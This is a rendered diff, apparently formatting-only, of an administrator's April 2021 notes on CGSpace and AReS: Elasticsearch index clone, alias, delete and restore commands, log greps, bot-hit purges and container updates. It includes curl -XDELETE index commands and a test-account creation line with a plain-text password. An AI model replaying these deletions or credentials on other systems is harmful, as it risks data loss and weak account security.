                                                                                                                                                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                            -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                              +$ curl -X PUT "localhost:9200/openrxv-items-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                              +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              • Now I see both openrxv-items-final and openrxv-items have the current number of items:
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                              -  "count" : 103373,
                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                              -$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                              -  "count" : 103373,
                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                +  "count" : 103373,
                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                +$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                +  "count" : 103373,
                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                • Then I started a fresh harvesting in the AReS Explorer admin dashboard

                                                                                                                                                                                                                                                                                                2021-04-12

                                                                                                                                                                                                                                                                                                @@ -672,39 +672,39 @@ $ curl -s 'http://localhost:9200/openrxv-items-f
                                                                                                                                                                                                                                                                                                • 13,000 requests in the last two months from a user with user agent SomeRandomText, for example:
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] "GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] "GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  • I purged them:
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
                                                                                                                                                                                                                                                                                                  -Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 13159
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
                                                                                                                                                                                                                                                                                                    +Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    +Total number of bot hits purged: 13159
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    • I noticed there were 78 items submitted in the hour before CGSpace crashed:
                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                    # grep -a -E '2021-04-06 0(6|7):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
                                                                                                                                                                                                                                                                                                    -78
                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      # grep -a -E '2021-04-06 0(6|7):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
                                                                                                                                                                                                                                                                                                      +78
                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      • Of those 78, 77 of them were from Udana
                                                                                                                                                                                                                                                                                                      • Compared to other mornings (0 to 9 AM) this month that seems to be pretty high:
                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                      # for num in {01..13}; do grep -a -E "2021-04-$num 0" /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
                                                                                                                                                                                                                                                                                                      - add_item; done
                                                                                                                                                                                                                                                                                                      -32
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -2
                                                                                                                                                                                                                                                                                                      -8
                                                                                                                                                                                                                                                                                                      -108
                                                                                                                                                                                                                                                                                                      -4
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -29
                                                                                                                                                                                                                                                                                                      -0
                                                                                                                                                                                                                                                                                                      -1
                                                                                                                                                                                                                                                                                                      -1
                                                                                                                                                                                                                                                                                                      -2
                                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                                      2021-04-15

                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                      # for num in {01..13}; do grep -a -E "2021-04-$num 0" /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
                                                                                                                                                                                                                                                                                                      + add_item; done
                                                                                                                                                                                                                                                                                                      +32
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +2
                                                                                                                                                                                                                                                                                                      +8
                                                                                                                                                                                                                                                                                                      +108
                                                                                                                                                                                                                                                                                                      +4
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +29
                                                                                                                                                                                                                                                                                                      +0
                                                                                                                                                                                                                                                                                                      +1
                                                                                                                                                                                                                                                                                                      +1
                                                                                                                                                                                                                                                                                                      +2
                                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                                      2021-04-15

                                                                                                                                                                                                                                                                                                      • Release v1.4.2 of the DSpace Statistics API on GitHub: https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.2
                                                                                                                                                                                                                                                                                                          @@ -723,8 +723,8 @@ Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                        • Create a test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          $ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                          • I added the account to the Alliance Admins account, which is should allow him to submit to any Alliance collection
                                                                                                                                                                                                                                                                                                            • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
                                                                                                                                                                                                                                                                                                            • @@ -735,62 +735,62 @@ Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                              • Update all containers on AReS (linode20):
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                              $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                • Then run all system updates and reboot the server
                                                                                                                                                                                                                                                                                                                • I learned a new command for Elasticsearch:
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                $ curl http://localhost:9200/_cat/indices
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
                                                                                                                                                                                                                                                                                                                -green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
                                                                                                                                                                                                                                                                                                                -green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
                                                                                                                                                                                                                                                                                                                -yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                -green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
                                                                                                                                                                                                                                                                                                                -yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  $ curl http://localhost:9200/_cat/indices
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
                                                                                                                                                                                                                                                                                                                  +green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
                                                                                                                                                                                                                                                                                                                  +green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
                                                                                                                                                                                                                                                                                                                  +yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                  +green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
                                                                                                                                                                                                                                                                                                                  +yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                  • Somehow the openrxv-items-final index only has a few items and the majority are in openrxv-items-temp, via the openrxv-items alias (which is in the temp index):
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                  $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' 
                                                                                                                                                                                                                                                                                                                  -{
                                                                                                                                                                                                                                                                                                                  -  "count" : 103585,
                                                                                                                                                                                                                                                                                                                  -  "_shards" : {
                                                                                                                                                                                                                                                                                                                  -    "total" : 1,
                                                                                                                                                                                                                                                                                                                  -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                  -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                  -    "failed" : 0
                                                                                                                                                                                                                                                                                                                  -  }
                                                                                                                                                                                                                                                                                                                  -}
                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' 
                                                                                                                                                                                                                                                                                                                    +{
                                                                                                                                                                                                                                                                                                                    +  "count" : 103585,
                                                                                                                                                                                                                                                                                                                    +  "_shards" : {
                                                                                                                                                                                                                                                                                                                    +    "total" : 1,
                                                                                                                                                                                                                                                                                                                    +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                    +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                    +    "failed" : 0
                                                                                                                                                                                                                                                                                                                    +  }
                                                                                                                                                                                                                                                                                                                    +}
                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                    • I found a cool tool to help with exporting and restoring Elasticsearch indexes:
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                    $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                    -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                    -Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
                                                                                                                                                                                                                                                                                                                    -Sun, 18 Apr 2021 06:27:07 GMT | dump complete
                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                      +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                      +Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
                                                                                                                                                                                                                                                                                                                      +Sun, 18 Apr 2021 06:27:07 GMT | dump complete
                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                      • It took only two or three minutes to export everything…
                                                                                                                                                                                                                                                                                                                      • I did a test to restore the index:
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                      $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-test --type=mapping
                                                                                                                                                                                                                                                                                                                      -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-test --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        $ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-test --type=mapping
                                                                                                                                                                                                                                                                                                                        +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-test --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                                        • So that’s pretty cool!
                                                                                                                                                                                                                                                                                                                        • I deleted the openrxv-items-final index and openrxv-items-temp indexes and then restored the mappings to openrxv-items-final, added the openrxv-items alias, and started restoring the data to openrxv-items with elasticdump:
                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                        $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                        -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                        -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                          $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                          +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                          +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                                                          • AReS seems to be working fine аfter that, so I created the openrxv-items-temp index and then started a fresh harvest on AReS Explorer:
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items-temp"
                                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            $ curl -X PUT "localhost:9200/openrxv-items-temp"
                                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                                            • Run system updates on CGSpace (linode18) and run the latest Ansible infrastructure playbook to update the DSpace Statistics API, PostgreSQL JDBC driver, etc, and then reboot the system
                                                                                                                                                                                                                                                                                                                            • I wasted a bit of time trying to get TSLint and then ESLint running for OpenRXV on GitHub Actions
                                                                                                                                                                                                                                                                                                                            @@ -798,35 +798,35 @@ $ elasticdump --input=/home/aorth/openrxv-ite
                                                                                                                                                                                                                                                                                                                            • The AReS harvesting last night seems to have completed successfully, but the number of results is strange:
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                            $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
                                                                                                                                                                                                                                                                                                                            -yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
                                                                                                                                                                                                                                                                                                                              +yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                              • The indices endpoint doesn’t include the openrxv-items alias, but it is currently in the openrxv-items-temp index so the number of items is the same:
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                                                              -  "count" : 103741,
                                                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                                                +  "count" : 103741,
                                                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                • A user was having problems resetting their password on CGSpace, with some message about SMTP etc
                                                                                                                                                                                                                                                                                                                                  • I checked and we are indeed locked out of our mailbox:
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ dspace test-email
                                                                                                                                                                                                                                                                                                                                -...
                                                                                                                                                                                                                                                                                                                                -Error sending email:
                                                                                                                                                                                                                                                                                                                                - - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
                                                                                                                                                                                                                                                                                                                                -)
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ dspace test-email
                                                                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                                                                  +Error sending email:
                                                                                                                                                                                                                                                                                                                                  + - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
                                                                                                                                                                                                                                                                                                                                  +)
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • I have to write to ICT…
                                                                                                                                                                                                                                                                                                                                  • I decided to switch back to the G1GC garbage collector on DSpace Test
                                                                                                                                                                                                                                                                                                                                      @@ -850,7 +850,7 @@ Error sending email:
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
                                                                                                                                                                                                                                                                                                                                   $ cp atmire-cua-update.xml-20210124-132112.old /home/dspacetest.cgiar.org/config/spring/api/atmire-cua-update.xml
                                                                                                                                                                                                                                                                                                                                   $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12 -g
                                                                                                                                                                                                                                                                                                                                   
                                                                                                                                                                                                                                                                                                                                    @@ -869,46 +869,46 @@ $ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisti
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                -$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  $ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
                                                                                                                                                                                                                                                                                                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                                                                  +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
                                                                                                                                                                                                                                                                                                                                  +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                                                                  +$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                  • Then I started a fresh AReS harvest

                                                                                                                                                                                                                                                                                                                                  2021-04-26

                                                                                                                                                                                                                                                                                                                                  • The AReS harvest last night seems to have finished successfully and the number of items looks good:
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                  $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                  -yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    $ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
                                                                                                                                                                                                                                                                                                                                    +yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
                                                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                                                    • And the aliases seem correct for once:
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                    $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                    -    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                    -        "aliases": {
                                                                                                                                                                                                                                                                                                                                    -            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                    -        }
                                                                                                                                                                                                                                                                                                                                    -    },
                                                                                                                                                                                                                                                                                                                                    -    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                    -        "aliases": {}
                                                                                                                                                                                                                                                                                                                                    -    },
                                                                                                                                                                                                                                                                                                                                    -...
                                                                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                                                                      $ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
                                                                                                                                                                                                                                                                                                                                      +...
                                                                                                                                                                                                                                                                                                                                      +    "openrxv-items-final": {
                                                                                                                                                                                                                                                                                                                                      +        "aliases": {
                                                                                                                                                                                                                                                                                                                                      +            "openrxv-items": {}
                                                                                                                                                                                                                                                                                                                                      +        }
                                                                                                                                                                                                                                                                                                                                      +    },
                                                                                                                                                                                                                                                                                                                                      +    "openrxv-items-temp": {
                                                                                                                                                                                                                                                                                                                                      +        "aliases": {}
                                                                                                                                                                                                                                                                                                                                      +    },
                                                                                                                                                                                                                                                                                                                                      +...
